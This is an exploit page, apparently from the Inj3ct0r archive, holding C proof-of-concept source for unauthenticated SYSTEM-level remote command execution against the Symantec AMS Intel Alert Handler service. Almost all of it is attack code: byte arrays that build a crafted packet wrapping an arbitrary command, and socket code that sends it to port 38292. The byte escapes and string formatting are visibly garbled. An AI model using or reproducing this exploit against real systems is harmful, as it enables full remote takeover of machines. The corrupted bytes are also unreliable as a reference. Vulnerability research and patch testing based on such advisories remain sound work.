Symantec AMS Intel Alert Handler Service Design Flaw
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Symantec AMS Intel Alert Handler Service Design Flaw</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Symantec AMS Intel Alert Handler Service Design Flaw
====================================================
// Remote command execution at System level without authentication
// Advisory:https://www.foofus.net/?page_id=149
// Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw
// Date: 07/28/10
// Author: Spider
// Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt
// Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed
// POC code to execute commands on system vulnerable to AMS2
// design flaw of Intel Alert Handler service (hndlrsvc.exe)
// within Symantec SAVCE 10.1.8 and earlier
// ***Created by Spider July 2009***
//——————–Foofus.net————————-
#include <stdio.h>
#include <dos.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
unsigned char payload[1000];
unsigned char inject1[] =
"xffxffxffxffxffxffxffxffx00×00"
"x02×00x95×94xc0xa8×02x64×00x00×00x00×00x00×00x00"
"xe8×03x00×00x50×52x47×58x43×4ex46×47x10×00x00×00"
"x00×00x00×00x04×41x4cx48×44x5cx46×00x00×01x00×00"
"x00×01x00×0ex00×52x69×73x6bx20×52x65×70x61×69x72"
"x65×64x00×25x00×53x79×6dx61×6ex74×65x63×20x41×6e"
"x74×69x56×69x72×75x73×20x43×6fx72×70x6fx72×61x74"
"x65×20x45×64x69×74x69×6fx6ex00xf9×1dx13×4ax3fx0c"
"x00×4cx41×42x53×59x53×54x45×4dx2dx31×00x08×08x0a"
"x00×52x69×73x6bx20×4ex61×6dx65×00x07×00x05×00x54"
"x65×73x74×00x08×0ax00×46x69×6cx65×20x50×61x74×68"
"x00×07x00×05x00×54x65×73x74×00x08×11x00×52x65×71"
"x75×65x73×74x65×64x20×41x63×74x69×6fx6ex00×07x00"
"x05×00x54×65x73×74x00×08x0ex00×41x63×74x75×61x6c"
"x20×41x63×74x69×6fx6ex00×07x00×05x00×54x65×73x74"
"x00×08x07×00x4cx6fx67×67x65×72x00×07x00×05x00×54"
"x65×73x74×00x08×05x00×55x73×65x72×00x07×00x05×00"
"x54×65x73×74x00×08x09×00x48×6fx73×74x6ex61×6dx65"
"x00×0ex00×0cx00×4cx41×42x53×59x53×54x45×4dx2dx31"
"x00×08x13×00x43×6fx72×72x65×63x74×69x76×65x20×41"
"x63×74x69×6fx6ex73×00x07×00x05×00x54×65x73×74x00"
"x00×07x08×12x00×43x6fx6ex66×69x67×75x72×61x74×69"
"x6fx6ex4ex61×6dx65×00x22×00x20";
unsigned char cmdother[] =
"x00×08x0cx00×43x6fx6dx6dx61×6ex64×4cx69×6ex65";
unsigned char inject2[] =
"x00×08x08×00x52×75x6ex41×72x67×73x00×04x00×02x00"
"x20×00x03×05x00×4dx6fx64×65x00×04x00×02x00×00x00"
"x0ax0dx00×46x6fx72×6dx61×74x53×74x72×69x6ex67×00"
"x02×00x00×00x08×12x00×43x6fx6ex66×69x67×75x72×61"
"x74×69x6fx6ex4ex61×6dx65×00x02×00x00×00x08×0cx00"
"x48×61x6ex64×6cx65×72x48×6fx73×74x00×0bx00×09x00"
"x44×45x41×44x42×45x45×46x00×00x00×00x00";
void banner (char *proga)
{
system("cls");
printf("nUse: %s <ip> <command>n", proga);
}
int main ( int argc, char *argv[] )
{
SOCKET sock;
WSADATA wsa;
struct sockaddr_in addr;
printf(" __ ___ __ __ __ n");
printf(" | / \ | / _/___ |__| _\ |___ _ __ | / \ | n");
printf("\_\\ //_/ \_ \ . \| |/ . / ._\| `_/ \_\\ //_/n");
printf(" .’/()\’. /___/ _/|__|\___\___\|_| .’/()\’. n");
printf(" \ \ / / |_\ \ \ / / n");
printf(" AMS Remote Command Tooln");
int port;
if ( argc < 3 )
{
banner(argv[0]);
exit(0);
}
char *ip_addr = argv[1];
int length = (int)strlen(argv[2]);
if (length > 128)
{
printf("n WARNING WARNING WARNING %s n");
printf("n Input Command String Greater than 128 Characters is not Permited %s n");
exit (0);
}
// building injection packet
inject1[353] = length+3;
inject1[355] = length+1;
memcpy(payload,inject1,356);
int a = 356;
for (int i = 0; i<(length); i++)
{
a=a+1;payload[a] = argv[2][i];
}
int b = a;
for (int i = 0; i<=14; i++)
{
b=b+1;payload[b] = cmdother[i];
}
int c = b;
payload[c+2] = length+3;
payload[c+4] = length+1;
int d = c+5;
for (int i = 0; i<length; i++)
{
d=d+1;payload[d] = argv[2][i];
}
int e = d;
for (int i = 0; i<=109; i++)
{
e=e+1;payload[e] = inject2[i];
}
// setting up socket and sending packet
printf("[] preparing….n");
WSAStartup(MAKEWORD(2,0), &wsa);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(38292);
addr.sin_addr.s_addr = inet_addr(ip_addr);
printf("[] connecting..n");
if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )
{ printf("[-] connection failed!n"); exit(0); }
printf("[] sending crafted packet 1 …n");
if ( send(sock, payload, sizeof(payload), 0) == -1 )
{ printf("[-] send failed!n"); exit(0); }
closesocket(sock);
WSACleanup();
return 0;
}
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-28]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13498
Leave a Reply